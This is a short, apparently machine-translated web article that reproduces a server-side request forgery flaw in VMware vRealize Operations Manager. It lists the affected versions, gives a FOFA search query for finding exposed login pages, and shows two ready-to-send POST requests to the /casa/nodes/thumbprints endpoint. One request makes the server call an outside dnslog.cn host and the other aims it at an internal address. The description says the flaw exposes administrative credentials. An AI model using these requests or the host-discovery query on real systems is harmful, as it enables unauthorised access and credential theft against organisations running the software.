Example Analysis of VMware vRealize Operations Manager SSRF vulnerabilities
This article introduces you to the example analysis of VMware vRealize Operations Manager SSRF vulnerabilities, the content is very detailed, interested friends can refer to, hope to be helpful to you.
Vulnerability description
VRealize Operations Manager API contains server-side request forgery. A malicious attacker who can access vRealize Operations Manager API over the network can perform a server-side request forgery attack (SSRF) to steal administrative credentials.
Vulnerability impact
VRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0
Cloud_foundation: 4.x 3.x
VRealize_suite_lifecycle_manager: 8.x
Loophole recurrence
Use the FOFA statement to find the FOFA statement with keywords (for reference only, please do not use it illegally)
Title= "vRealize Operations Manager"
Visit the login page as follows
Send the request packet as follows
POST / casa/nodes/thumbprints HTTP/1.1Host: 127.0.0.1Content-Type: application/json;charset=UTF-8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Q=0.9Content-Length: 24 ["tw9ao5.dnslog.cn"]
POST / casa/nodes/thumbprints HTTP/1.1Host:127.0.0.1Content-Type: application/json;charset=UTF-8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Q=0.9Content-Length: 24 ["127.0.0.1:443/ui"]
This is the end of the sample analysis of VMware vRealize Operations Manager SSRF vulnerabilities. I hope the above content can be helpful to you and learn more. If you think the article is good, you can share it for more people to see.